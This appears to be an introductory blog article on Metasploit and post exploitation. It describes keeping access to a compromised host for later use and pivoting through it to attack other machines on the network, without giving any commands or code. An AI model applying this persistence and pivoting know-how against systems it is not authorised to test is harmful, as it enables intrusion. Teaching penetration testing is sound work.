Metasploit has now become the king of tools used in penetration testing. It’s comprised of a collection of all available exploits. The
tool has its pros and cons; some advantages are:
- It automates the process of penetration testing
- Fast (less time require)
- Reliable
- It offers a lot of advanced features that we will discuss step by step
Just
as a comparison between automatic and manual penetration testing and
vulnerability assessment approaches: the automatic process is fast but
in some cases does not give the desired result. Manual testing is slow,
but more precise and we cannot neglect it. As far as disadvantages go,
metasploit does not have one, excepting the possibility that automatic
tools do not always work. The point being, metasploit only has the
available exploits. If the server’s software is fully patched, then
metasploit would fail. (There are many methods of using metasploit.
Here, “fail” means to exploit the available vulnerability.) This being
the case, we will surely need to implement a manual test to find the
0-day vulnerability. This then is the weakness of metasploit. However,
metasploit is the hot topic among penetration testers, and many advances
have been made. The security community is currently working to make
metasploit even more useful.
Metasploit is based on module system.
From this point onward, I will assume that you are aware of basic usage
of metasploit, like about msfconsole, meterpreter, exploits, payload
and auxiliary module.
Post Exploitation
The
main objective in discussing post exploitation is to cover meterpreter
scripting. Post exploitation is the technique/ method /procedure or
standard to identify and to monitor a target host, to find the way of
future access.
What is post exploitation? Why is post exploitation
important? Some of these questions are important to understand the
phenomena, so let us suppose you have successfully hacked (compromised) a
host, but you want to use this session for some other time. It is not a
good practice to start things all over again. Moreover, what of you
fail next time? Therefore, the best method is to prepare the compromised
system for the next use. The other phase of post exploitation is to use
the compromised host as an attacker machine and to attack on some other
host or network via this compromised machine. Consider the picture below:
Now the above diagram shows the importance of post exploitation. Let
us suppose that an attacker has successfully compromised the victim A. Now, the attacker wants to go on the web server, so for victim A,
the web server is on the network. To hack on the same network is very
easy: instead of a remote attack for this purpose, the attacker can use
victim A as its own machine to attack on the network. This is what’s known as the post exploitation phase.
To conclude, the post exploitation attack is the process of:
- Infrastructure analysis
- Routing analysis
- Protocol analysis
- DNS server analysis
- ARP analysis
- Proxy server analysis
- Host machine analysis (virtual or real host)
- Services and software’s analysis
- Sharing analysis
- Directory, name server and certificates analysis
- Backup and patch management analysis
To be continued :
This is an introductory part of the article that discuss the foundation of post exploitation, in the next article of this series we will discuss the practical of meterpreter scripting. Stay update and do not forget to share.
Note: If you want to learn more about Linux and Windows based Penetration testing, you might want to subscribe our RSS feed and Email Subscription or become our Facebook fan! You will get all the latest updates at both the places.
